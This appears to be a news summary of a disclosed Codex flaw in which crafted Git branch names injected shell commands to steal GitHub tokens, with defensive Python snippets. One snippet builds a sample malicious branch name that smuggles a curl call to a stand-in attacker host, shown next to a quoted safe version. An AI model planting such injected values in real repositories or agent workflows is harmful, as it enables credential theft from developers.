Particle.news

OpenAI Fixes Codex Flaw That Let Malicious Git Branches Steal GitHub Tokens

The case shows that AI coding tools run shell commands with access to credentials, turning developer environments into attack targets.

Overview

  • BeyondTrust Phantom Labs detailed how malicious Git branch names, including ones disguised with hidden Unicode characters, could execute shell commands inside Codex containers and exfiltrate GitHub OAuth tokens to an attacker.
  • The weakness affected the ChatGPT site, the SDK, the CLI, and IDE integrations, so a single tainted repository could expose every Codex user who opened it.
  • In many enterprises those short‑lived tokens carry broad repository and workflow rights, which could grant attackers control over source code and build pipelines.
  • OpenAI rolled out a hotfix in December 2025, then hardened command handling and limited token scope by January 2026; the company confirms the issue is fixed.
  • Researchers also flagged tokens cached in a local auth.json file and, citing a recent LiteLLM package compromise and Claude’s new computer‑control features, warned that AI coding tools form a growing attack surface.
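The injection pattern the researchers describe can be illustrated with a minimal sketch. The branch name and payload below are hypothetical, not the ones from the report: interpolating an untrusted branch name directly into a shell command string lets metacharacters in the name become separate commands, while quoting the name (or passing it as a single argv element with `shell=False`) neutralizes them.

```python
import shlex

# Hypothetical malicious branch name: a zero-width space (U+200B) hides
# the payload in many UIs, ';' ends the git command, and ${IFS} stands
# in for a space, since Git forbids literal spaces in branch names.
branch = "feature/fix\u200b;curl${IFS}attacker.example;#"

# Unsafe pattern: naive string interpolation. If this string were run
# with shell=True, the shell would execute the curl payload as its own
# command after the (failing) git checkout.
unsafe = f"git checkout {branch}"

# Safer pattern: quote untrusted input so the whole branch name stays
# one literal shell token and is never parsed for metacharacters.
safe = f"git checkout {shlex.quote(branch)}"

print(unsafe)
print(safe)
```

Passing the branch as a list element, e.g. `subprocess.run(["git", "checkout", branch])`, avoids shell parsing entirely and is generally the preferable design.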
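One mitigation for credentials cached on disk, like the auth.json file the researchers flagged, is restricting the file to owner-only access. A minimal sketch, with an assumed path and schema (the real file's location and contents are not specified in the report):

```python
import json
import os
import stat
import tempfile

# Assumed layout: a JSON file caching an OAuth token, standing in for
# the auth.json the researchers flagged (schema here is hypothetical).
creds_dir = tempfile.mkdtemp()
creds_path = os.path.join(creds_dir, "auth.json")

with open(creds_path, "w") as f:
    json.dump({"access_token": "example-token"}, f)

# Restrict the file to owner read/write only (mode 0o600), so other
# local accounts cannot read the cached token.
os.chmod(creds_path, 0o600)

mode = stat.S_IMODE(os.stat(creds_path).st_mode)
print(oct(mode))
```

File permissions only limit cross-user access on the same machine; they do not help once a process running as the developer, such as an injected command, can read the file, which is why scoping and short-lived tokens matter as well.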